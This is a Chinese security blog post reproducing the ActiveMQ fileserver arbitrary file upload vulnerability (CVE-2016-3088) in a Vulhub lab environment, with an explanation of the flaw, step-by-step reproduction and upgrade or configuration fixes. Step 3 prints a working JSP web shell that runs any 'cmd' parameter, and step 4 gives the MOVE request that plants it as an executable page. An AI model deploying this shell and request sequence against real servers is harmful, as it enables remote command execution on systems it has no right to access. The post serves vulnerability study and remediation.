ActiveMQ PUT任意文件上传漏洞复现

admin 2022年1月13日18:54:23评论341 views字数 1170阅读3分54秒阅读模式
1 漏洞介绍
    ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中间件软件。
ActiveMQ PUT任意文件上传漏洞复现
    在Apache ActiveMQ 5.x~5.14.0版本中存在漏洞,攻击者可通过该漏洞写入JSP文件从而执行命令。

2 漏洞原理
    ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;
    admin和api都需要登录后才能使用,fileserver无需登录。
    本漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。
    所以,我们只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。

3 漏洞复现
(1)用Vulhub加载相关的漏洞环境
ActiveMQ PUT任意文件上传漏洞复现
(2)访问路径查看ActiveMQ的绝对路径
http://192.168.1.104:8161/admin/test/systemProperties.jsp
ActiveMQ PUT任意文件上传漏洞复现
(3)构造PUT请求上传测试文件,返回204
<%@ page import="java.io.*"%><% out.print("Hello</br>"); String strcmd=request.getParameter("cmd"); String line=null; Process p=Runtime.getRuntime().exec(strcmd); BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream())); while((line=br.readLine())!=null){ out.print(line+"</br>"); }%>
ActiveMQ PUT任意文件上传漏洞复现
(4)构造MOVE将txt内容移动到jsp中
Destination:file:///opt/activemq/webapps/api/5.jsp
ActiveMQ PUT任意文件上传漏洞复现
(5)访问jsp文件,成功执行命令。
ActiveMQ PUT任意文件上传漏洞复现

4 修复建议
  • 1. ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本
  • 2. 通过移除 confjetty.xml 的以下配置来禁用 ActiveMQ Fileserver 功能
  • 3. 打补丁
http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt

5 参考文章
https://www.cnblogs.com/huangxiaosan/p/14222694.html

原文始发于微信公众号(Reset安全):ActiveMQ PUT任意文件上传漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月13日18:54:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ActiveMQ PUT任意文件上传漏洞复现http://cn-sec.com/archives/735618.html

发表评论

匿名网友 填写信息